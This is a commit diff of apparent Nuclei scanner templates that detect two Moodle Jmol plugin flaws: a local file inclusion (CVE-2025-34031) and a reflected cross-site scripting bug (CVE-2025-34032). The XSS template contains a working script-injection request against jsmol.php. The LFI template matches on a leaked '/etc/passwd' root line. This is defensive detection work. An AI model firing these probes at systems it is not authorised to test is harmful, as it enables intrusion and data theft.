Update and rename moodle-filter-jmol-lfi.yaml & moodle-filter-jmol-xss.yaml

http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml → http/cves/2025/CVE-2025-34031.yaml

@@ -1,19 +1,22 @@
-id: moodle-filter-jmol-lfi
+id: CVE-2025-34031
 
 info:
   name: Moodle Jmol Filter 6.1 - Local File Inclusion
   author: madrobot
   severity: high
-  description: Moodle is vulnerable to local file inclusion.
+  description: |
+    Moodle Jmol Filter 6.1 is vulnerable to local file inclusion through the jsmol.php file, allowing attackers to read arbitrary files on the server.
   reference:
     - https://www.exploit-db.com/exploits/46881
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-34031
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N
+    cve-id: CVE-2025-34031
     cvss-score: 7.5
     cwe-id: CWE-22
   metadata:
     max-request: 1
-  tags: moodle,lfi,edb
+  tags: cve,cve2025,moodle,lfi,edb,jsmol
 
 http:
   - method: GET
@@ -22,12 +25,17 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
-# digest: 4b0a00483046022100f94185a8eabe63f53fbb9f491b50762b1b2d0cf5e86a0659f1ba8980e32c601102210096118270c1fa4708ceef2e9dac7592366eefe698b670ab81c5867034daa2833f:922c64590222798bb761d5b6d8e72950
+
+      - type: word
+        part: content_type
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200
+# digest: 4b0a00483046022100f94185a8eabe63f53fbb9f491b50762b1b2d0cf5e86a0659f1ba8980e32c601102210096118270c1fa4708ceef2e9dac7592366eefe698b670ab81c5867034daa2833f:922c64590222798bb761d5b6d8e72950

http/cves/2025/CVE-2025-34032.yaml

@@ -0,0 +1,38 @@
+id: CVE-2025-34032
+
+info:
+  name: Moodle LMS Jmol Plugin <= 6.1 - Cross-Site Scripting
+  author: madrobot,ritikchaddha
+  severity: medium
+  description: |
+    A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content.
+  reference:
+    - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-34032
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cve-id: CVE-2025-34032
+    cvss-score: 5.4
+    cwe-id: CWE-80
+  metadata:
+    max-request: 1
+  tags: cve,cve2025,moodle,xss,edb
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'len(body) == 41'
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+        condition: and
+
+      - type: regex
+        regex:
+          - '^<script>alert\(document\.domain\)</script>\s*$'
+# digest: 490a0046304402202ce4ab09dfbb0d1a283ed44ecf36d605d0ca9b1daf7c865bc6dff2377cae6fe302201755c894c9fb9d830625ffad6822664793240ae4e1f14fd340b92b5c2be20517:922c64590222798bb761d5b6d8e72950